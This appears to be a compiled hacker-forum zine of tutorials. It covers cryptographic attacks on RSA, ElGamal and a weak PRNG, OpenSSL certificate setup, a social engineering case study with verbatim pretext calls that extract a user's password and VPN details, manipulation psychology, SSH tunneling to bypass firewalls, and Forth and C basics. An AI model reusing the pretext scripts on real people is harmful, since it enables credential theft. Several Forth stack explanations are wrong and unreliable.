This scheme is clearly broken: I enter into a transaction to add $100 to my account. I observe the resulting (Y, Z) that is sent. Then I send (Y, Z^3). If you think about this for a second, it will credit my account with $1000000 (since Z^3 = B^(3e) = (B^3)ê).

Of course even if I had no idea about RSA I could of course just keep repeating (Y, Z) (a Replay Attack)!

Clearly this is a problem. Before you rush out and try this, it is of course not very likely to work!

You may say "well of course, if they use the signature scheme of RSA then this won't work". You'd be very wrong. Let's look at the signature scheme of RSA: We pick a random message L say and send it to our recipient. We then encrypt that message, but this time we use our private key - so we send L^d. The recipient can then use our public key to decrypt L^d and ensure it is L. Since we are the only ones with the private key it must have come from us. This is RSA authentication. It is very

useful for many things, but it only provides a signature of the sender, not a signature of the message. So it will not protect against the homomorphism attack. Also anyone can produce valid signatures which we have to hope are not meaningful. Another method of RSA authentication is to send a random message, encrypted normally to the person whose identity we wish to verify. If we then later receive a message ending in that, then we can be sure it came from them. When we discuss SSL, we will see that if we don't use signatures then man in the middle attacks are also possible, meaning that we get very little real security from the encryption.

There is a better solution - we sign the actual message. For that we can use the ElGamal Signature Scheme.

The ElGamal Signature SchemeWe should probably start by defining a trapdoor function - something you will probably know of. It is simply a map from the Cartesian product of messages and keys to a set of signatures (in other words given a message and a key it returns a signature) such that without knowledge of the key, we can check a signed message is valid, yet it is very difficult to forge (meaningful) signed messages. ElGamal does this. It works as follows:

We pick a large prime p. We then find a primitive root mod p. We then also pick an exponent u between 0 and p. Then our public key is p, g and y = g^u (mod p). Our private key is just u.

To sign a message m (a number between 0 and p) we choose a random exponent k, coprime to p-1, between 0 and p and then compute r and s such that:

1. r = g^k (mod p)

2. m = ur + ks (mod p-1)

Then we sign the message with (r,s).

To verify the message we calculate g^m, and check it is equal to (y^r)(r^s) (mod p). This works since g^m = g^(ur + ks) = ((g^u)^r)((g^k)^s) = (y^r)(r^s) modulo p.

It is believed, but not proven, that forging an ElGamal signature is as hard as solving the discrete logarithm.

Breaking ElGamal

Like most of the attacks I'm discussing, they are theoretical, and rely on a poor implementation. One thing we must remember to do in ElGamal is choose a new k for each message. Otherwise, if we have used the same k twice for messages A and B, then:

A = ur + ks1

B = ur + ks2

(where messages are signed (r,s1) and (r,s2))

then A - B = k(s1 - s2) modulo p-1

So there are gcd(s1-s2, p-1) solutions for k, and we check r = g^k (mod p). Once we have found k, then A = ur + ks1 (mod p-1) so there are exactly gcd(r, p-1) solutions for u, and we can check y = g^u (mod p). This way we recover the secret key.

It should also be noted that several existential forgeries are known for ElGamal.

There are a great many uses for RSA and friends. One use you may not have thought of is bit commitment: where we want to send a message in such a way that the recipient cannot read the message until we send more information, yet we cannot change the message. Uses for this might include selling stock market tips etc. We can simply encrypt using RSA to ourself, send the message, and it can only be real when we send our private key. Another very elegant method uses coding theory, not cryptography.

OpenSSLTo review what we now know about, and see how RSA is used in real situations, here's how to use SSL to create RSA keys for practical purposes, perhaps for an IRC server or a web server.

First we create an RSA Private Key:

Code:

$openssl genrsa -des3 -out server.key 1024

Generating RSA private key, 1024 bit long modulus.........................................................++++++........++++++e is 65537 (0x10001)Enter PEM pass phrase:Verifying password - Enter PEM pass phrase:

We should now be able to guess what this all means. we are encrypting our private key with triple-DES for extra security (hence the request for a pass phrase) and generating a 1024 bit key. We also note that we are told the value of e: 65537. This is actually a fairly common value due to some nice

properties of the number.

If we want to remove the pass phrase we can. A reason to do this is that Apache or our IRC daemon etc. will ask for the pass-phrase each time the server is started. This may not be convenient. If we do this however it is critical the file is kept secure - if the server is compromised then anyone can use our unencrypted private key. To do this we do:

Code:

cp server.key server.key.orgopenssl rsa -in server.key.org -out server.key

(Here we make a copy of the encrypted key first.)

The next step to actually use this is to create a Certificate - containing the public key amongst other things. This is also used to verify your identity. One issue with public key cryptography is verifying you have the correct public key for your recipient - else we have a classic man in the middle attack where you have no idea who you are actually encrypting to. To get around this we can get our public key 'signed' by someone we trust, who has verified we are who we say we are. This way users need only have hard verified copies of the certificate authorities who they trust, and can therefore use that to trust new certificates. We do this by creating a CSR (Certificate Signing Request) which we then send to Thawte or Verisign etc. who will verify our identity and issue a signed certificate. We create a CSR as follows:

Code:

openssl req -new -key server.key -out server.csr

Country Name (2 letter code) [GB]:State or Province Name (full name) [Berkshire]:Locality Name (eg, city) [Newbury]:Organization Name (eg, company) [My Company Ltd]:Organizational Unit Name (eg, section) []:Common Name (eg, your name or your server's hostname) []:Email Address []:Please enter the following 'extra' attributesto be sent with your certificate requestA challenge password []:An optional company name []:

filling in the fields as appropriate.

It is a common misconception that getting a certificate signed is a difficult or expensive process - there exist free certificate authorities (although they provide a lower level of verification).

However it still requires some effort and a few practical issues to deal with. What if we just want to create a public key that people can verify another way? We can 'self-sign' our certificate. Note this is never a good thing to do - after all it clearly provides no verification whatsoever that we are who we say we are! However if our users can obtain the fingerprint of our public key another way (maybe we have it on our website) then it can still provide a higher level of security than plaintext transmission. We do this as follows:

Code:

$openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt

Signature ok---SOME OUTPUT HERE---

If we use this in a web server many browsers will refuse access with self-signed certificates. But if we know what we are doing we can get round this. In IRC clients for example there is often an option to accept invalid certificates etc.

Once we've created server.crt and server.key we can place them in whatever directory is used for SSL certificates by our server software, and set up our server and go. If we have a self-signed certificate we can tell people the fingerprint (eg on our website) so they can verify the certificate and accept ot. That's all there is to it!

Final ThoughtsOne thing we have mentioned several times is 'diffusion and confusion'. We should explain this. Claude Shannon defined these as the key two properties of a practically secure cipher in 1949. Confusion refers to making the relationship between the key and the ciphertext as complex and as involved as possible. Diffusion refers to the property that redundancy in the statistics of the plaintext is 'diffused' in the statistics of the ciphertext. In a cipher with good diffusion flipping an input bit should change each output bit with probability of one half - this is called the Avalanche Effect and is a desirable property - one of the primary design objectives of a block cipher or a hash (which I haven't discussed) for example.

Another thing I should mention is Elliptic Curve Cryptography. Very briefly. Complimentary to RSA it is based around the difficulty of the discrete logarithm problem (in the context now of more general large finite groups). The solutions of an elliptic curve (an equation of the form y = x^3 + ax + b), together with the point at infinity form an abelian group. If we restrict x and y to a finite field then that group is finite and often large, and it is believed the discrete logarithm on such a group is more difficult that the corresponding problem in the underlying field's multiplicative group. One advantage is that much shorter keys can be used for a comparable level of security to RSA. As you can see the mathematics is a little trickier.

MiscellaneousSince this has been a rather all-over-the-place post, I'll finish up with a few miscellaneous bits and pieces.

Firstly a reminder of modular arithmetic in case you were wanting an outline of that.

We say that two numbers x,y are equivalent modulo n if x-y is a multiple of n. Equivalently they have the same remainder when divided by n. This clearly defines an equivalence relation on in the integers. In particular we can define addition and multiplication between the classes by simply choosing a representative and doing standard arithmetic. So for example, working modulo 5 say, 3=8 mod 5, so we can calculate 3 + 2 mod 5 by doing either 3 + 2 = 5, or 8 + 2 = 10, and both 10 and 5 are of course in the same equivalence class modulo 5. This also works for multiplication, and most importantly the operations are Well Defined (it doesn't matter what representative choose). Facts to remember include: division doesn't always work. For example modulo 4, there is no number we get from 1/2. Indeed a number modulo n has a multiplicative inverse if and only if it is coprime to n. In particular that means every number has an inverse modulo a prime number (a critical point in RSA). A fairly substantial theorem tells us that modulo p, where p is prime, there is (possibly lots) a number g such that for any x there is an a with g^a = x. g is called a primitive root or a generator. In other words the multiplicative group is cyclic if you like that sort of thing. Also we need to know Fermat's Little Theorem - if we raise a number to the power of p-1 modulo p then it always gives 1. A critically important generalization used in RSA says that modulo n, x^phi(n) = 1 mod n. (phi(n) is the totient function - in RSA we only need to know it is (p-1)(q-1), more generally in is the number of numbers coprime to n).

That probably won't help much if you don't know modular arithmetic, but if you do, then it will remind you of what you need to know to understand RSA. Perhaps someone else can explain it better - only I think this post is long enough!

Finally since I said we would, and now we know about cryptography, let's break d4de's 'Closecrypt Encryption System v1.0'. You can find his code in another thread. We will break the 'CSPRNG'.

A brief outline about how the RNG works: we feed the program an initial seed consisting of a few digits between 0 and 255 which we shall call s0, s1, s2, s3,... Then a random number is produced using that seed, which we shall call b0. Then the seed state is updated (similar principle to the LFSR) in the following way: 2*s0 + b0 replaces s0. 2*s1 + s0 + b0 replaces s1. 2*s2 + s1 + s0 + b0 replaces s2. And so on. This happens each time a random number is output (replacing b0 with b1 and b2 and so on). All this is done modulo 256, so that we remain between 0 and 255.

This is clearly flawed - if we captured some of the output, then we know b0,b1,... say. Can we reconstruct the state of the seed knowing just this? At first glance no, since we don't know the s0, s1 etc. that is used. However the multiplication by 2 is a big mistake - for example consider just s0, the first digit of the seed state. each round we are multiplying it by 2 and adding the random number output. Eventually the unknown variables, namely s0,s1,... etc. will have been doubled at least 8 times, so they will disappear modulo 256 (since 2^k = 0 modulo 256 for k greater or equal to 8). So if we have enough of the output stream we have all the information required to figure out the state of the seed. Mathematically we are solving a set of equivalence relations, which become entirely dependent on the output vector when working modulo 256 after a while. So in three easy steps:

1 - Write a recursive function to solve the recurrence relationships, ignoring the terms we don't know, since they are zero anyway.

2 - Take the data, use this recursive function to calculate the state of the seed.

3 - start predicting future output.

You can see my code to do this in the same thread as the 'Closecrypt Encryption System v1.0' was posted. My code also does a little extra work to allow you to guess the seed state even if you don't have enough output data.

And that's it!

Off-topicApologies that this is such a messy article - some bits are brushed over a little quick as I wanted to cover quite a lot. I hope it's useful. If it goes down okay, then I'll happily write about any other crypto topics people would like to know about, or talk in more technical detail about anything I've already covered. Also I may write something about actually doing practical attacks on SSL and SSH in a real situation (man in the middle, statistical SSH attacks) that you can actually try out, since this article is all rather abstract and theoretical (sorry!).

Hope that helps.

Social EngineeringAuthor: LinxThis is based upon experience and is more of an educational story, hope it helps you all.

What is Social Engineering?Social engineering is the art of manipulating the weakest point of security in any network.... the users.

The end user is the weakest point in any network. You can have state of the art firewalls, IDS, anti virus and regularly update your machines general security with patches and hot fixes, but at the end of the day, if one user is unaware or slips up... its all for nothing.

Please do not disregard this as another tutorial that says the following

Quote:

“Yoo should tell the victim dat deez filez contains |\/|4j0r pr0n!!! then when they downloadz it they get infected!!!”

This is in a word completely idiotic to write a tutorial on and should be reserved for poser 12 year olds who just discovered Sub7 and doesn't quite understand the concept of not being a complete and total skid mark.... I mean skiddy.

This tutorial will explain in detail a case study situation (genuine with names changed) and go into detail about decisions and conversations that resulted in a system breach.

So its hacking.....?Not as such. Hacking is such a loose word now-a-days. Hacking used to refer to a programmer and still does today, however the media have turned this into a frenzied word. Now when the public hears the word hack they think of someone who is the equivalent of a terrorist and should be put away for life.

Hacking to me is the art of making something do what its not ideally designed to... in this case, make the user and/or staff members of a firm give you access unknowingly.

So its psychology.....?Shut up and read...

Case Study...OK onto my case study. This is based on a true story. Names and company names have been changed accordingly. Please note this case study was performed under a live environment where the IT team of this particular firm where aware of my actions. In short, this was legal, don't try this at home...

I was told to attempt to bypass the security of Alpine Ltd. I had been told that any method was valid inclusive of brute force as this would assist in helping the IT security team test their IDS and also their internal reporting.

I didn't ideally want to take on a security system heads up that look like this one. This company had approximately 2000 end users (according to the corporate website) and I was also aware of at the time, a VPN entry point. I decided to attempt social engineering as im not particularly fond of breaching VPN via brute force. Its noisy, I wanted to be a ninja, not Rambo.

I browsed the corporate website for a while and found many names of top ranking people within the business, these being heads of offices and directors. This also included site names, bonus.

So as of right then if I was to call their switchboard (number on the website) I could most likely pose as one of them, failing this I could pretend that I knew them, ooooor I could just keep schtum and carry on research.

So I had a few names, nothing major but a start. I called switchboard and asked for a few names of people in the IT department. She said she couldn't give direct names so I got diverted through to a general number.

When the IT guy picked up he answered as expected “Desktops, John speaking.”. First name discovered.

The conversation went something like this...

Quote:

“Hi John my names Davey I work at site 223 in London”

“How can I help”

“Yeah Ive got a slight issue with my machine and its coming up with some weird errors when im trying to print, can I send a screen shot direct to you?”

“I can remote on now if you want?”

“Wont be able to do that im afraid, on my laptop and I need it for a presentation in a meeting in a few minutes.”

“Best send the screen shot then and il log the call”

“Nice one! Whats your email?”

“[email protected]”

“Thanks John”

I now had a complete name of someone within the desktops team.

Moving swiftly on, I now had names and telephone numbers of major players within this firm and office locations, which in turn, got me a desktop engineers full name.

After briefly going over the list of major players and their departments I decided to call a few people in the sales area. This had a manager by the name of Kirsty Sayes. Sales areas normally have users which have laptops as they work off site. These laptops 9.5 times out of 10, have some form of dial-up/VPN enabled.

Called the switchboard again

Quote:

“Hi, this is John from desktops”

“How can I help?”

“Yeah im looking to get in touch with Kirsty Sayes but she told me shes going to be off all week, are you able to put me through to one of her sales staff at all so I can run a few checks on a laptop?”

“Certainly, il put you through...”

**** NOTE ****The reason I don't want to speak with Kirsty directly is that managers of this sort tend to have very close relations with the IT team, especially with home users.

**** ****

So I got put through to this sweet little lass named Cheryl.

Quote:

“Hi Cheryl, this is John from the desktops team.”

“Hey”

“Cheryl I was just wondering, I'm in charge of making sure all the laptops in the firm are suitable for a migration to take place possibly early next year and need to test a few accounts from test

machines”

“......right?”

“Just curious but you don't mind if we borrow your account details to test them with..... I mean we could just reset the password but we don't want to put anyone out of action for the day”

“Should be a problem”

“OK, im assuming you sign in with your first initial and last name” (a standard for most companies)

“yeah”

“Whats your last name Cheryl?”

“Parker”

“And your password Cheryl?”

“passw0rd1”

“Perfect, and Cheryl do you usually connect through VPN?”

“Yes”

“Diamond, OK one last thing, I just need to check some details on your VPN client, this is just to double check because we don't want to get anything wrong.......”

We then went on to discuss every option within her VPN client. Now knowing a users logon, password and VPN credentials I was in.

Conclusion:To sum up, social engineering is the art of manipulating the user. With just a few phone calls I managed to convince people I was someone I was not and also obtain remote login details for a sales agent (in a real life scenario that would have opened the door to stealing company sales figures and client information). This would have also left the network wide open for privilege escalation.

Information from the companies website is more vital than you first may think. One name can make all the difference. Knowing a location that you can confidently say that you are based at and convince the user your calling from is also vital.

I hope you enjoyed this tutorial. Social engineering is not something you can really learn from reading. Its more of a trial and error skill.

Basic PsychologyMany of the things I have learnt have been from psychologists and surprisingly enough... ninjas. Throughout my papers I will point out good books and links to sites to learn more.

On with the show...

Security in CommunitiesA quick dive into the world of how feeling secure can assist social hackers...

Community... Coalition... Society... Alliance... association... union... All these words relate to one main factor, that is, belonging to a group.

So what is it that entices us into these so called groups? Is it the social aspect? No.

We go round in groups no matter what as a form of security. When security is offered to an individual its almost always chosen over someones personal free will (This statement will almost certainly cause debate).

For an example of this il refer to a few experiments held by psychologists. I wont go into great detail but googling the names will reveal a wealth of information on them, Ive also provided wiki links for immediate research.

The Third Wave - Ron Jones

(http://en.wikipedia.org/wiki/The_Third_Wave)

Ron Jones essentially turned a class of school kids in the 1960's into a near replica of NAZI Germany. These students were found to have given up their free will and adopted everything the teacher gave to them. Students concentration and compliance increased amongst other perks however the experiment was terminated at the end of week 1. This really is an interesting read on the power of leadership (or dictatorship) in a community.

Milgram Experiment - Stanley Milgram

(http://en.wikipedia.org/wiki/Milgram_experiment)

The experiment consisted of a supervisor (the psychologist), the actor in the electric chair and the individual who was being experimented on played the electrocutioner.

The actor in the chair would act in distress and pain, yet the user would be comforted by the supervisory figure into believing that it was not actually hurting the gentleman in the chair. The user continued on regardless of the screams and complaints of heart conditions from the actor. An interesting view on how someone responds to an authority figure.

Stanford Prison Experiment - Philip Zimbardo

(http://en.wikipedia.org/wiki/Stanford_prison_experiment)

Taking regular members of the public and putting them into a prison environment. One half guards, the other half cons. This study showed the effects of positions of power within society and how quickly some people can embrace it and revolt against it.

Many more experiments exist but these 3 should be fine to provide a base line for the psychological anatomy of the human mind.

In all these 3 experiments we witness people in stressful situations but relying on the security of those around them. When that security is provided, it seems that the end user can be led to do anything.

Users led to electrocute people who, they are sure, they are causing pain and torment. Users who formerly believed in free will, within several hours turned into a new world order and users who given the chance of a position of power will use it and abuse it.

So where am I heading with this as a social hacking concept...

When security is offered, it is accepted. Promise of security can be related to a mothers love. When you fell over as a baby, your mother nurtured you, your father protected you and any siblings you had (despite the odd bit of bickering) stood by you. Security isn't just protecting someone from harm, its making them feel relaxed and calm in your presence.

In the world there are many things someone can get stressed about and not many people will come to their aid. Money is always a problem with most people as is relationship issues, work and more likely than not if offered a way out of these situations, we will comply to most things.

If someone offered to remove your money worries, would you accept?

If someone made you feel more comfortable socially, would you accept?

If someone said that if you'd performed a certain act (within reason) you'd be promoted, would you accept?

From a social hackers perspective this can be utilized to attack a group and/or certain individuals to entice them to assist you or do your will.

Conclusion...I know this seems like a scatty tutorial but there is sense within the lines. In short, everyone needs a form of security and its a key part into understanding how to manipulate users from the social hackers perspective.

SSH Tutorials

SSH Tunneling ExplainedAuthor: LinxI don't know how everyone else feels about this, but SSH tunneling goes without explanation all the time within tutorials etc. So today im taking a different approach... im going to explain everything I can about SSH tunneling and also how and why we configure Firefox the way we do to use it. This is not intended to be a full blown tutorial on how to set up an SSH server, although I may be doing one shortly as im in the middle of setting up a Linux server on my network at home. But server side configuration is not the aim of this specific tutorial!

There comes a time in every hacker/engineers life/day when we want our data to remain secure from prying eyes. This tends to be when we use our laptops on Wifi hot spots or if we browse online profiles containing personal information from work... and school i suppose.

An SSH tunnel aids in encrypting data transmitted from your terminal so that no packet sniffers etc can read data from your machine. It works by sending requests to an external SSH server (set up by yourself) and in turn receives the packets from this said external server. Hence, all data is encrypted in transit when traveling through the network you are currently on... il show you with a diagram later on but stay with me here.

Lets just quickly cover how a website request is performed...

1) User types into the URL field the site name (www.google.com)

2) Users client then sends a request to the DNS server on the network who responds with the IP of the requested URL (74.125.19.147)

3) Client then connects to port 80 (\\74.125.19.147:80)

4) Website data is sent back to client

Now this all might seem relatively simple and to be perfectly honest... it is. but lets move on and incorporate an SSH tunnel...


2) Users client then sends a request to the DNS server on the network who responds with the IP of the requested URL (74.125.19.147)

3) Client sends encrypted data request to SSH tunnel requesting data from 74.125.19.147

4) SSH Tunnel sends encrypted data back to client

OK so now we can see that the SSH tunnel is now involved and packets are being encrypted around the network... but your still making DNS queries on the domain so we need to direct all DNS queries to the SSH server, otherwise, you'll find that despite the data is encrypted the web monitor on the LAN will still be aware of where you are going to online.

To do this we simply load up Firefox and configure it to perform DNS queries elsewhere. Firstly make sure you've set the remote proxy settings in the relevant tab (i think its either "Connections" or "LAN Settings" im at work now and don't have Firefox on my PC). Once this has been done we can move on.

In the URL field of Firefox type "about:config". Search or filter through the on screen display for "network.proxy.socks_remote_dns". Once found change this to True. This will essentially divert all DNS queries to the SSH server. In turn this will mean that the only thing any server monitor will be able to see coming from your terminal is encrypted requests being sent to your SSH server IP.

So now when we look at the process list again:


2) Users client then sends a request to the remote DNS server

3) SSH server sends back encrypted data advising that the IP is 74.125.19.147

4) Client sends encrypted data request to SSH tunnel requesting data from 74.125.19.147

5) SSH Tunnel sends encrypted data back to client

Apologies for the crude drawings.... i was using MSPaint to do them :S.

So that concludes the SSH Tunnel explanation.

How to Configure SSHAuthor: Xiao TanThe main concepts, I will not go in detail, but will describe the practicalities of ssh tunneling.

Let's say you're at Starbucks or an airport. You connect to an unsecured wireless network with your laptop and log in to your US account. When you send information over a network, it's typically sent in plaintext over the whole network. Any skiddie do some packet sniffing, or even ARP poisoning and intercept the data that you send, such as passwords, etc.

You're at the library. Or school You want to play "The Hardest Game in the World". The firewall blocks the sites hosting the game. You feel depressed that level 190712 is still not beaten.

Both these cases can almost always be resolved by ssh tunneling. SSH stands for "secure shell" and unlike telnet, encrypts all the traffic sent through. We can utilize this capability and transmit Internet traffic through an encrypted ssh tunnel, thus bypassing firewalls and guaranteeing safe transmission of your data.

Requirements: Internet, a server that has an ssh service running on it, lastly, an ssh client. (In this case, putty).

Download putty from Here (http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe)

1) Open it up, and enter the hostname or IP address of the server along with the port. SSH listens at a default port of 22, but depending on the server settings, the port number may vary. This is for security purposes. Mine is set to 2222 as an example. Make sure ssh is ticked.

If the server is password based authentication, skip down to step 3, as the xterm window will prompt for a username and password. You should either own the server or have an account on it.

2) If the server has a public-private key authentication, you will need to specify the location of the private key. The public key that complements your private one should already be on the server. I won't go in detail of generating keys in this tut.

3) Now comes for setting up the tunnels. Go down to "tunnels" at the left and pick a port that isn't blocked by a firewall if you're behind one. Leave the destination box empty and choose the option "dynamic". Leave the second option as "auto"

Then press add. I used a random port of 6060.

4)You may change any other settings in the putty client if you want. Once you're all set, press "Open". You should get a prompt.

Press yes, or no, whatever one you want. It's just asking if you want the server's host keys cached into your machine's registry.

6)If you used password authentication, just enter the username and password. If you used public key based authentication, enter the pass phrase of the private key. If all goes well, you should be presented with a logged in shell on the server.

7) Now, to initialize the forwarded tunnels. Open up Firefox. Or another browser that supports SOCKS proxies. Go to the network tab, and choose settings.

8) Down at the SOCKS proxies section, enter localhost (127.0.0.1) as the host, and enter the port that you forwarded. Also make sure that SOCKS V5 is ticked. Press okay. Go to a site to test it out.

Well there you have it! All your Internet browsing traffic will be secure and firewall free.

Programming TutorialsForthAuthor: BlackjackhkrForth, created in the 1970's by Charles (Chuck) Moore. Forth uses Reverse Polish Notation instead of Infix notation for math. In Reverse Polish Notation you have your two operands followed by the operator whereas in Infix Notation you have your two operands separated by an operator. For example...

Infix Notation...

Code:

2 + 2 * 3 / 2 = 5

Reverse Polish Notation...

Code:

2 2 + 3 * 2 / = 6

Though, Revers Polish Notation looks fairly odd, it tends to be more convenient than Infix Notation because you get to eliminate the use of the order of operations. So, why does Forth have to be the "odd ball" and use the mathematical notation that most people have probably never even heard of? Because it is a stack oriented language. It's basically like having a bunch of plates stacked on top of each other. You can put a plate on top of another plate, so the newest plate is always on top, and usually the first one you get. Of course, you can get the plate underneath it or a plate in the middle, but that takes more work than just grabbing one off of the top. This is how Forth works, except with numbers of course. Every time you enter a number in Forth it adds the number to the stack. you can then use "words' to manipulate the numbers on the stack. Forth's words are like the words in a dictionary; They are words that are accompanied by definitions. Once you enter a word into Forth (via the interpreter) it will look up that words definition in the dictionary which will be either more Forth code or assembly code. Lets look back at the Reverse Polish Notation example above:

Code:

2 2 + 3 * 2 /

First, 2 and 2 are added to the stack so the stack now looks like this (from top to bottom):

Code:

22

Then the word '+' is used, which in turn takes the first two numbers off of the stack and adds them together, deleting the two numbers from the stack but adding the sum to the stack, so it looks like this:

Code:

4

Then it adds 3 to the stack...

Code:

34

Now the interpreter sees the word '*' and looks it up in the dictionary, which in turn multiplies the first two numbers on the stack, deleting them and adding the product to the stack, so it looks like this:

Code:

12

Now, we add 2 to the stack...

Code:

212

Then the interpreter see's the word '/' which in turn is defined as so it takes the first two number off the stack, divides them, deletes them, and adds the quotient to the stack...

Code:

6

This seems quite simple, though, say there's three numbers in the stack and you need to add all three of them together. Your stack would look like this...

Code:

316

and your code would look like this...

Code:

3 1 6 + +

(or something similar.)

But what if we want to multiply, say the first and third numbers together. Then, we would have to use the word 'ROT' (note, that in older Forth interpreters it is necessary to use all caps). ROT takes the third number in a stack and moves it to the top. To represent this, we can use a diagram such as

Code:

(n1 n2 n3 -- n3 n1 n2)

where the left-most side is the original stack and the right-most side is the modified stack.

There are many of definitions to alter the stack but the most common used are...

Code:

DUP (n1 -- n1 n1)ROT (n1 n2 n3 -- n3 n1 n2)OVER (n1 n2 -- n2 n1 n2)DROP (n1 n2 -- n2) or simple (n1 -- )PICK (n1 n2... nx -- nx n1 n2) <-- I'm not sure if this is completely correct or not.

PICK is a special definition that is used to pick any number from the stack. It takes the first number on the stack and deletes it, then picks that number from the stack. For example, if a stack were to look like...

Code:

5698

and we were to run

Code:

3 PICK

then the new stack would look like

Code:

9568

Well, this is all fine and dandy, but it's usually nice to be able to see what ever is on the stack printed on the screen. This is possible by using the word '.' which is defined so it takes the first number off of the stack and prints it on the screen, though in return it also deletes the first value off the stack so it's usually accompanied by a DUP. For example...

Code:

2 2 + DUP .

This will add 2 and 2 together to get 4, put for on the stack, duplicate 4 so there are now two 4's on the stack and then print 4 on the screen. The stack now looks simply like

Code:

4

You can also output characters and string of text too with the word '."' (pronounced dot-quote). The string must have a space between the word dot-quote word and it must end with a '"' at the end of the string. For example...

Code:

2 2 + ." Two plus two is:" .

Forth allows us to add words to it's dictionary temporarily. The word ":" tells the interpreter that the next word typed in will be added to the dictionary and everything proceeding it will be that words definition. To end the definition you simply use the word ';'. Here's an example...

Code:

: ADD5 5 + ;

For now on, if you type ADD5 it will in turn run it's definition

Code:

5 +

Forth also allows for input, as we will see later on, though first, it is necessary to cover one other thing. Loops and conditional statements. A loop, as in most other languages, will simple execute a bit of code until a certain condition is met. A conditional statement is a statement that checks whether something is true or not.

In Forth, the words '=' (equals) '<' (less than) and '>' (greater than) are used to compare two numbers. Each one pulls the first two numbers off of the stack and checks whether the statement is true, and then replaces them with either a 0 or a 1. These are known as flags, where as a 0 means false and a one means true. For example...

Code:

2 2 + 4 =

will produce a stack simply consisting of 1.

This is pretty useless until we put it together with either a conditional statement or loop. Both statements and loops have to be within a definition in the dictionary. The main conditional statement in Forth is the if statement, normally consisting of the words 'IF' 'ELSE' and 'ENDIF'. The 'IF' word checks whether the top number on the stack is 0 or 1 and if it is 1 it will then execute the code between IF and ELSE; if it is 0 it will execute all of the code between ELSE and ENDIF. ENDIF is simply a marker telling the interpreter where the end of the IF statement is. Here's an example...

Code:

: CHECK 2 2 + 4 = IF ." True" ELSE ." False" ENDIF ;

This example will print 'True' to the screen.

Loops are also a very valuable part of forth. The most common loop is the BEGIN-UNTIL loop. The word 'BEGIN' is used to tell the interpreter when the beginning of the loop is. The 'UNTIL' word is used much like the word IF in the fact that it checks to see if the top number on the stack is 0 or 1, though if it is 0 the code between BEGIN and UNTIL will repeat again. For example...

Code:

: LO 0 BEGIN 1 + DUP DUP DUP . 10 = UNTIL ;

This bit of code will print all of the numbers between 1 and 10 to the screen.

Loops are commonly used for input from the keyboard. The word 'KEY' will capture the next key you press and add it's ASCII value to the top of the stack. When you press the key, it will not be echo'd so you will not see the key on the screen. In turn you can use the word 'EMIT' to take the ASCII value off the top of the stack and print it's corresponding letter/number/symbol on the screen, though, like many other words in Forth, it will delete it off of the stack so you may want to accompany it with a DUP. For example...

Code:

KEY DUP DUP ." You pressed ASCII value " . ." which is equivilant to " EMIT

This is fine if all you need is input for one character but what if you want a persons name? Then you can enclose KEY and EMIT in a loop.

Code:

: GN BEGIN KEY DUP DUP EMIT 13 = UNTIL ;

This code will let the user type whatever they want and put the ASCII values of the string on the stack. Notice at the end of the line of code that 13 is added to the stack and compared to the ASCII value for the Return key (ASCII 13) so that UNTIL will terminate once the user hits Return (also known as the Enter key).

Something that should be mentioned before I wrap up this paper is that Forth is neither a fully interpreted or compiled language. It is both, thus it is a threaded language. For GNU/Linux you can get GForth to compile/interpret forth code from the main repositories. It also comes with a block editor which is used to edit code outside of the interpreter (though I won't go into details of how to use it here). A block editor is pretty old school and was used years ago when Forth was used as an operating system, though today, a text editor will work fine. You can simply type code in a text editor just as you would in the interpreter and run 'gforth [file]' (assuming your using the GForth compiler/interpreter) to run your code.

Disclaimer:

This is just a basic overview of the Forth language. There is much, much more to the language than what I've included in this paper. To find out more about Forth, just Google it. You can also check out http://www.complang.tuwien.ac.at/for...rth/Docs-html/ for the (official?) gforth docs

Creating libraries in C/C++Author: BlackjackhkrThis time I'll go through how to create libraries in C/C++. I will assume you're using Linux and gcc. Also you need to have a basic understanding of C or C++ to get the hang of this. I remember when I started using Linux and quite soon after started programming. I wondered very much what the fuck was up with /lib and /usr/lib and where the code that I thought was in the different headers in /usr/include was. A very elite person I know told it was routines for applications and operating systems. I didn't really get the hang of it then but I've got it later. Now I've decided I'd like to share this knowledge to you.

Libraries are just compiled code stored for future use. They also have a header file to reference the functions and classes and other things in them. The big advantage is that you don't have to compile it more than once and after that you're able to use them how many times you want. The headers exists for you and your compiler to provide descriptions (function prototypes, class definitions....) so you know how to interface with the library. Libraries are also good if you want to release some code but don't want to share the code as they're compiled. But please don't do this as we want all code to be open source.

There is three different kinds of libraries; static, shared and dynamic. Static libraries is just an archive of object (.o) files. They are linked into the executable of every program that uses them. This results in each different application using the library having it's completely own copy of it in memory. So if program A and program B is using library C, two copies of C will be in the memory. This is of course a disadvantage when it comes to efficiency.

A shared library is linked to a program but is not put into the executable. It's loaded when the program is started. If it's not already in memory. This is an advantage of course that a shared library never have more than one copy in memory. So if program A and B is relinked against the shared library D they will share a single copy of D.

The last kind of libraries is dynamic libraries. They're loaded whenever you want them to be loaded. You don't link them into your code. But you must include the dlfcn.h header file and link your code against libdl. You then use a function called dlopen() to load them directly in your code. Plus if two applications loads the same library at the same time it will only exist a single copy in memory, just like a shared library.

Okay, I think that's enough theory, now starts the fun!

Static librariesWhen you create a static library you have to create a header (.h) file and a source (.c or .cpp) file. You separate the code as in my separation tutorial. When you have your code in a source and a header file you compile the file but do not link it. With gcc this could be accomplished like this:

Code:

g++ -c -o libexample.o libexample.cpp

The -c option tells gcc that it should compile the code and assemble it but don't link it. Just make an object file. When that's done all you need to do is create an archive. The static library archives is created with the ar command:

Code:

ar rcs libexample.a libexample.o

This will create an archive called libexample.a from libexample.o. What exactly rcs means in this case is unknown to me. But I know those are needed. Here's an example of a library which I'll call libexample:

libexample.h:

Code:

#ifndef __LIBEXAMPLE_H__ #define __LIBEXAMPLE_H__ #include <iostream> using namespace std;

class example { public: void showMsg(); };

#endif

libexample.cpp:

Code:

#include "libexample.h"

void example::showMsg() { cout << "This is an example message from the example class."; }

As you can see it's not anything special or overly complicated code-wise. To create a library from this neat example write:

Code:

g++ -c -o libexample.o libexample.cppar rcs libexample.a libexample.o

Okay, now you've got a library but nothing that uses it. We need an example.cpp which includes libexample.h and is linked against libexample.a. A simple example.cpp may look like:

Code:


int main() { example msgobj; msgobj.showMsg(); return 0; }

This code isn't so special either. As you can see now, this whole thing about creating libraries is nothing about the code and all about the compilation/linking process. At least when it's about static or shared libraries. To compile this example code that makes use of the library we write like this:

Code:

g++ -o example example.cpp -L. -lexample

